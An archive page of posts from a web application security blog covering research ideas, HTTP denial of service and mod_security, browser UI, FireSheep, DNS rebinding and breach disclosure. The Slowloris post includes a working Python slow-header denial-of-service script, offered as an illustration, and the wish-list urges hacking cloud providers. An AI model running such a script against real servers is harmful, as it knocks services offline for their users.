web application security lab

Archive for the 'Webappsec' Category

What’s Left?

Wednesday, December 1st, 2010

2 posts left…

As I wind down, I've gotten a lot of requests to talk about various things in my final posts - everything from what newbies should study, to how to keep up on WebAppSec when I'm gone, to O2. But what I really want to talk about is: what's left? After having researched for 15 years and having blogged for 5, what areas do I think are left to research/write/build? There are tons of things. I'll just type free-form for the next few minutes:

- I think mobile browsers are Swiss cheese and they need a much more serious look. And then we need to have a fierce conversation with the mobile providers about better/faster mechanisms to do patch management.

- I think browser port blocking blacklists are dumb and have already been broken at least three times. It’s time to do a month of inter-protocol exploitation!

- I think browser UPnP attacks against routers are highly likely and need a lot more research.

- I think the whole concept of replacing SSL/TLS with SSL/TLS over DNSSEC needs a ton more thought.

- Browser UIs need to be hammered - they all have problems.

- Re-writing the firmware in home DSL routers and building router-based botnets is under-researched.

- A table of all the ways to leak information across domains (img tags, style tags, iframes, etc…) needs to be kept and cataloged by browser type.

- An acid test should be built on a website somewhere so that people can test all known security problems against their browser. Then we can start a healthy competition and track how long each browser takes to close each issue.

- Cloud providers need to be hacked to prove how frail everything that relies on them is.

- SSL/TLS resellers need to be hacked to prove how frail PKI is when you distribute it out to the least common denominator.

- Alternate encoding issues are still barely understood and very poorly documented.

- Someone needs to build a ubiquitous DoS (not DDoS) package that includes every known DoS tool and throw it into Metasploit, so companies have to start testing against it and start pressuring the vendors to fix the issues.

… and that's just what I could type out in a few minutes. Look, anyone who says there's nothing left to research isn't thinking creatively. There's an absolutely amazing number of issues left to research, and projects that could make the industry move faster. One problem I wish the industry would get away from is saying something isn't new or isn't interesting. If it's not new but it's still broken, there's a problem there (Firesheep is a great example). If you're interested in something, don't let other people tell you it's not interesting. Go ahead and research it! So what's left? Everything's left, my friends! The world is yours! You have the power to make amazing things happen if you so choose. It's just a matter of deciding what kind of world you want to live in.

Mod_Security and Slowloris

Wednesday, December 1st, 2010

3 posts left…

After all the press around Wong Onn Chee and Tom Brennan's version of an HTTP DoS attack, I think people started taking HTTP DoS a tad more seriously. Yes, there are lots of variants of HTTP-based DoS attacks, and I'm sure more tools will surface over time. The really interesting part is how both Apache and IIS have disagreed that it is their problem to fix. So we are left to fend for ourselves. Enter mod_security (at least for Apache).

When I originally tested Slowloris against mod_security, it had no chance of solving the problem. I spoke with Ivan Ristic, who said that it simply ran too late (same thing with .htaccess and many other things built into Apache). So the world was at a bit of a loss when the DoS originally came out. Now, with the latest changes in mod_security, we at least have a viable (non-experimental) solution other than using alternate web servers, load balancers or networking solutions. Very cool stuff!
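For anyone who hasn't seen the attack up close, here's a minimal sketch of the slow-header technique Slowloris relies on (illustrative only - the hostname and connection count are placeholders, and you should only ever point this at servers you own). The key detail is that the request headers never finish, which is exactly why anything hooked into Apache's normal request-processing phases historically ran too late to see it.

```python
# Minimal sketch of the Slowloris-style slow-header technique (illustrative only).
# TARGET and CONNECTIONS are placeholders; test only against servers you own.
import socket
import time

TARGET = "test.example.internal"   # placeholder host
PORT = 80
CONNECTIONS = 200                  # arbitrary illustrative number

socks = []
for _ in range(CONNECTIONS):
    s = socket.create_connection((TARGET, PORT), timeout=5)
    # Send an intentionally incomplete request: the headers never end with a
    # blank line, so the server keeps a worker waiting for the rest of them.
    s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET.encode() + b"\r\n")
    socks.append(s)

while True:
    time.sleep(10)
    for s in socks:
        # Trickle one more bogus header per connection to reset the server's
        # read timeout, keeping every worker slot occupied indefinitely.
        s.send(b"X-a: b\r\n")
```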

Minimalistic UI Decisions in Browsers

Tuesday, November 30th, 2010

4 posts left…

I've tried to talk about this a few times with people over the last year or so, but I think it's hard to explain without pictures. So I gathered a bunch of screenshots that should help explain why I'm not a huge fan of the minimalistic browser concept. More browsers are getting on board with this, and while I absolutely do believe it makes people more productive and therefore faster, there are some negatives that are worth pointing out. Frankly, I do believe there is a lot of wasted space in browsers, so at first blush, I'm sure most people would agree that the various browsers are heading in the right direction by emulating Chrome. I actually agree with the basic concept, with the exception that I think there are some gotchas that are worth thinking about before we're "got".

I'm certainly not saying there's no way to fix these issues either, but I don't think it's wise to run headlong into a bunch of potentially dangerous problems without knowing that they're there. So I hope this sheds some light for those people I talked to, and for anyone else who's interested! :)

Cheating Part 2

Sunday, November 21st, 2010

5 posts left…

So my Wife decided that she loves to play that game "Words with Friends" on the iPhone. It's basically just like Scrabble, but probably for legal reasons it's just slightly different (bonus placement, tile values, etc… are different). Unfortunately for me, my Wife is scary smart and knows the English language far better than I do. So I'm at a huge disadvantage when playing games that involve words or spelling. The only thing I'm good at is the math part, figuring out what the highest scoring word is… oh, yeah, and cheating. Well, after a few dozen games, I kinda got fed up with the whole thing and started looking for ways to cheat. Sure, it's probably talking an unencrypted protocol and it's probably doing most of its validation checks on the client side, but my Wife is going to notice if I start using words that aren't words.

So I start thinking about writing a tool that brute forces through the dictionary and attempts each word in a simulator to see if it'll fit. Then the idea starts taking shape in the form of a program that tabulates which letters are worth what, where the various double and triple word scores are in relation to the tiles, etc… It grows in complexity further and further until I finally decide that I had better test it before I go much further. So on my first trial run it picks the word "exine". Okay, whatever, I plug it in and it works as expected. My Wife was on chat with me at the same time and instantly she writes, "Wtf is exine? You're cheating." So at this point I look up the word and sure enough it's defined as "the outer coat of a spore, esp. a pollen grain", to which she writes, "You totally cheated. You are so not a botanist. Spore my ass. Your mom is the outer coat of a spore. I don't believe it for a second that you knew that word before playing it."
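For what it's worth, the core of that brute-force idea fits in a few lines. This is a minimal sketch under some stated assumptions: it only checks whether a word can be built from the current rack (no board placement or bonus squares), the letter values are approximate Scrabble-style values rather than the game's real ones, and the word-list path and sample rack are placeholders.

```python
# Sketch of the dictionary brute force described above. Simplified: rack-only,
# no board placement or bonus squares, and the letter values are approximate.
from collections import Counter

LETTER_VALUES = {  # rough Scrabble-like values; the real game's values differ
    'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4, 'g': 2, 'h': 4, 'i': 1,
    'j': 8, 'k': 5, 'l': 1, 'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1,
    's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8, 'y': 4, 'z': 10,
}

def playable(word, rack):
    """True if the word can be spelled using only the tiles in the rack."""
    need, have = Counter(word), Counter(rack)
    return all(have[ch] >= n for ch, n in need.items())

def best_word(rack, dictionary):
    """Return the highest-scoring playable word, or None if nothing fits."""
    candidates = (w for w in dictionary if playable(w, rack))
    return max(candidates,
               key=lambda w: sum(LETTER_VALUES.get(ch, 0) for ch in w),
               default=None)

if __name__ == "__main__":
    # Placeholder word list and rack; /usr/share/dict/words exists on most Unix systems.
    with open("/usr/share/dict/words") as fh:
        words = [w.strip().lower() for w in fh if w.strip().isalpha()]
    print(best_word("exineaq", words))  # placeholder rack of seven tiles
```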

Alas, all that work and she called me out the VERY first time I tried out my program. Of course, in hindsight I should have parsed apart every word I had ever written in the blog or in my books and compared them against the dictionary, to only use words that I was guaranteed to know. Such a waste. So I never got to try my other theories about how to play defensively. For instance, when I know there's only a certain number of tiles left in the bag, I can figure out which letters she can have left and the probability of which words she can play.

It would have been fun to create a contest to see which strategies are the most effective in a bot-on-bot scenario. Is an all-defensive strategy better, or an all-offensive one (always opportunistically taking the highest value word)? Or maybe a hybrid of both, where you play defensively at some points and offensively when you know it's better in the long run. Anyway… unlike the previous cheating at Casino night, this was not a very successful attempt. Like I said, my Wife knows that I cheat - she knows her adversary way too well. You win some, you lose some, I guess. That's what I get for not marrying a bimbo.

FireSheep

Monday, November 15th, 2010

7 posts left…

I go back and forth on whether I think FireSheep is interesting or not. Clearly, it's old technology re-hashed. But it is interesting not because it works, but because it surprises people that it works. We've been talking about these problems forever, and now companies are scrambling to protect themselves. I guess the threat isn't real until every newbie on earth has access to the hacking tools to exploit it.

One of the more interesting analysis pages I've seen was one that had a scorecard. At first blush it's fairly obvious, but one thing stuck out at me regarding the last part of the scorecard, where they assigned scores to each of the various protocols - e.g., POP3 fails but POP3 over SSL/TLS gets an A. The interesting thing is that there isn't an equivalent score for HTTP vs HTTPS. This all goes back to the 24 vulnerabilities Josh and I talked about in the browser implementation of SSL/TLS.

Just because something is speaking HTTPS some of the time doesn't even mean that session alone is secure in a multi-tabbed environment, or with certain plugins, or with certain settings within cookies, etc… It's just not that straightforward. Wouldn't it be nice if we had something that did act in a safe and sane way that allowed you to contact a site securely? Maybe something that was a secured transport layer (no, not TLS, I mean something actually secure). ;) Maybe it's something we can add on top of SSL/TLS over DNSSEC while we in the browser security world are still in the mood to shake things up.
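To make the "settings within cookies" point concrete, here's a minimal sketch of the header-level difference between a session cookie a FireSheep-style sniffer can grab and one the browser will refuse to send over plain HTTP. The values are placeholders, and the Strict-Transport-Security line is the (then very new) HSTS mechanism, shown only as one way to close the mixed HTTP/HTTPS gap described above.

```python
# Sketch: the response headers that decide whether a session token ever
# crosses the wire in cleartext, where a FireSheep-style sniffer is listening.
# Values are placeholders.

# Vulnerable: no Secure flag, so the browser also attaches this cookie to any
# plain-HTTP request to the same host (e.g., an image loaded over http://).
leaky = "Set-Cookie: session=abc123; Path=/; HttpOnly"

# Better: Secure restricts the cookie to HTTPS; HttpOnly keeps script from reading it.
strict = "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly"

# HSTS: tells the browser to refuse plain HTTP to this host entirely for a year,
# which also covers the multi-tab / mixed-content cases mentioned above.
hsts = "Strict-Transport-Security: max-age=31536000"

for header in (leaky, strict, hsts):
    print(header)
```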

Detecting Malice With ModSecurity

Thursday, October 28th, 2010

8 posts remaining…

Ryan Barnett has a new series he's doing called Detecting Malice with ModSecurity that I wanted to spend a minute talking about. Firstly, it's personally interesting, because he's taking the book, slicing and dicing a lot of the core ideas, and figuring out how to implement them. But secondly, I like practical examples of solutions to concepts that may seem unattainable or a technological hurdle at times. One of the reasons I didn't spend any time talking about solutions was that so many people have varying platforms. That's one of the nice things about the Internet, but it's also one of the problems. Attacks are easier to talk about because nearly everyone is vulnerable to them; defense is much harder, because it is always very site-specific.

Anyway, it's a great series and I recommend it, even after just the first post - not just because it's talking about the book, but also because he does a really nice job of giving thorough examples. I hope some people get some value out of it. Even if you use IIS, ideas like this get the creative juices flowing. Sometimes it's tough being a security guy, so any little bit helps.

DNS Rebinding In Java Is Back

Wednesday, October 20th, 2010

9 posts remaining…

Stefano Di Paola has an interesting article about DNS Rebinding in Java. Apparently he's found a way to bring back some of the older exploits that were supposedly fixed in Java back in the 2007-2008 timeframe. Really cool read. Halfway through reading it, I realized that this would enable exploits like the one where sites often have localhost.whatever.com tied back to 127.0.0.1. The old exploit worked in that if you could ever find an XSS in a local service, you could set cookies for the whatever.com domain, or read any cookies that were scoped to the entire domain. It's a nasty exploit, but rare, because there don't tend to be a lot of local services installed on desktop computers that are vulnerable to XSS by default.

Then I kept reading and saw that he enumerates that exact use case - great minds think alike! Anyway, this apparently will be fixed in a future update, but now that we've seen DNS rebinding hit Java twice, I think Java needs a much more critical eye. Things like this shouldn't be sitting around for years before they're noticed. Like inter-protocol exploitation, this research needs a lot more eyes. Great work by Stefano!
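As a side note, checking whether a given domain exposes that localhost.whatever.com pattern is just a DNS lookup away. Here's a minimal sketch - the domain list is a placeholder, and this only spots the loopback record, not whether an XSS-able local service is actually listening.

```python
# Sketch: flag domains whose "localhost." subdomain resolves to loopback, the
# misconfiguration that lets an XSS in a local service set or read cookies
# scoped to the parent domain. The domain list below is a placeholder.
import socket

DOMAINS = ["example.com", "example.org"]

for domain in DOMAINS:
    host = "localhost." + domain
    try:
        addrs = {info[4][0] for info in socket.getaddrinfo(host, 80)}
    except socket.gaierror:
        continue  # no such record
    if addrs & {"127.0.0.1", "::1"}:
        print("%s resolves to loopback -> cookie-scoping risk for .%s" % (host, domain))
```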

Performance Primitives

Wednesday, October 20th, 2010

11 more posts left…

While I was out at Bluehat I ended up having some good meetings with Intel, Mozilla and Adobe. How are these companies related, you may ask? Well, all of them care about performance. A year or so ago I was hanging out with the Intel guys and they informed me that they have a series of low-level performance primitives that they surface through APIs. At the time I wasn't quite sure what to make of it. Security and performance aren't natural bedfellows - or at least I didn't think so at the time.

I got to talking with both Microsoft and Mozilla last week about the need for default ad-blocking software built into the browser. Jeremiah thinks it should be opt-out and I think it should be opt-in, but either way, I think we're coming to a consensus that it should be automatically part of the browser in some form. Mozilla was the first to give me a real reason it may be a problem other than it hurting Google, which is their biggest sponsor. The reason is performance. Adblock Plus, as an example, uses partial-string regexes, which are a performance hog. To put that in the browser by default would really make people's experience suffer. Then it occurred to me that I had had a conversation about performance with Intel a year before. The answer, my friends, lies in primitives.
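To put a rough number on that "performance hog" claim, here's a small synthetic sketch - the filter count, patterns and URLs are all made up, and real Adblock Plus filter lists are both larger and more complex than plain substrings - showing how the per-page cost adds up when every resource request is checked against every filter.

```python
# Rough sketch of why naive filter matching hurts: every resource a page loads
# gets checked against every filter. All numbers here are made up for illustration.
import time

filters = ["/ad-slot-%d/" % i for i in range(20000)]                    # synthetic filters
resources = ["http://example.com/asset%d.js" % i for i in range(100)]   # one page's requests

start = time.perf_counter()
blocked = sum(1 for url in resources if any(f in url for f in filters))
elapsed = time.perf_counter() - start

# 100 requests x 20,000 filters = 2,000,000 substring scans for one page load,
# and that work repeats on every single page the user visits.
print("checked %d URLs against %d filters in %.3fs, blocked %d"
      % (len(resources), len(filters), elapsed, blocked))
```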

Currently Intel supports a subset of basic math functions and Perl’s version of regex. Well, in a future version the chips could support things like the JavaScript version of regex, and other primitives involved in decision making and image/vector rendering and so on that are used within the browser. Adobe is in the same boat - although probably a different subset of primitives would be desirable. Then the idea sprang up to use these primitives within Visual Studio itself to get more generic/native improvements to performance without developers having to know anything about the chip. Intel doesn’t tend to market these concepts very well, despite how interesting they could be, but only a few people have to know to make a big difference.

So now the real question isn't whether these companies will pick up on this technology now that they know about it - that's a given. The real question is, once they get a performance boost, are they going to use some of it to improve security, or are they just going to tout themselves as the fastest? At some point we have to stop and ask ourselves how fast we really need to get before we start using some of that processing power to make people safer instead. One can only hope…

Odds, Disclosure, Etc…

Tuesday, September 14th, 2010

12 posts left…

While doing some research I happened across an old post of mine that I had totally forgotten about. It was an old post about betting on the chances of compromise. Specifically, I was asked to give odds on whether I thought Google or ha.ckers.org would survive a penetration test (one ultimately leading to disclosure of data). Given that both Google and ha.ckers.org are under constant attack, it stands to reason that sitting in the ecosystem is virtually the equivalent of a penetration test every day. I wasn't counting things like little bugs that are disclosed in our sites; I was specifically counting only data compromise.

There are a few interesting things about this post, looking back 4 years. The first thing is that pretty much everything I predicted about Google came true:

… their corporate intranet is strewn with varying operating systems, with outdated versions of varying browsers. Ouch. Allowing access from the intranet out to the Internet is a recipe for disaster …

So yes, this is damned near how Google was compromised. However, there's one very important thing, if I want to be completely honest, that I didn't understand back then. I gave 1:300 odds (against) on Google being hacked before ha.ckers.org would be. While I was right, in hindsight I'd have to change my odds. I should have given it more like 1:30. The important part that I missed was the disclosure piece. Any rational person would assume that Google has had infections before (as has any large corporation that doesn't retain tight controls over its environment). That's nothing new - and not what I was talking about anyway. I was talking only about publicly known disclosures of data compromise.
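Just to translate that into probabilities: reading "a:b against" as a chance of a/(a+b) - which is one common convention, and the post's notation is admittedly informal - the revision from 1:300 to 1:30 is roughly an order-of-magnitude increase in likelihood.

```python
# Rough arithmetic behind the revised odds, reading "a:b against" as a/(a+b).
def implied_probability(a, b):
    return a / (a + b)

print("1:300 against -> %.2f%%" % (100 * implied_probability(1, 300)))  # ~0.33%
print("1:30  against -> %.2f%%" % (100 * implied_probability(1, 30)))   # ~3.23%
```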

So the part that I didn't talk to, and the part that is the most interesting, is that Google actually disclosed the hack. Now, if we were to go back in time and you were to tell me that Google would get hacked into and then disclose that information voluntarily, I would have called BS. The cynics might say that Google had no choice - that too many people already knew, and it was either tell the world or have someone out them in a messy way. But that's irrelevant. I still wouldn't have predicted it.

So that brings me to the point of the post (as you can hopefully see, this is not a Google-bashing post or an I-told-you-so post). I went to Data Loss DB the other day and I noticed an interesting downward trend over the last two years. It could be due to a lot of things. Maybe people are losing their laptops less, or maybe hackers have decided to slow down all that hacking they were doing. No, I suspect it's because in the dawn of social networking and collective thinking, companies fear disclosure more than ever before. They don't want a social uprising against them when people find out their information has been copied off. Since I have no data to back it up, I have a question for all the people who are involved in disclosing or recovering from security events: what percentage of the data compromises that you are aware of have been disclosed to the public? You don't have to post under your own name - I just want to get some idea of what other people are seeing.

If my intuition is correct, this points to the same number of breaches as ever before, or more, but less and less public scrutiny and awareness of what happened to the public's information. Perhaps this points to a lack of good whistle-blower laws against failing to disclose compromises (and monetary incentives for good Samaritans to do so). Or perhaps this points to a scarier reality where the bad guys have all the compromised machines and data that they need for the moment. Either way, it's a very interesting downward trend in the public stats that seems incongruent with what I hear when I talk to people. Is the industry really seeing fewer successful attacks than a few years ago?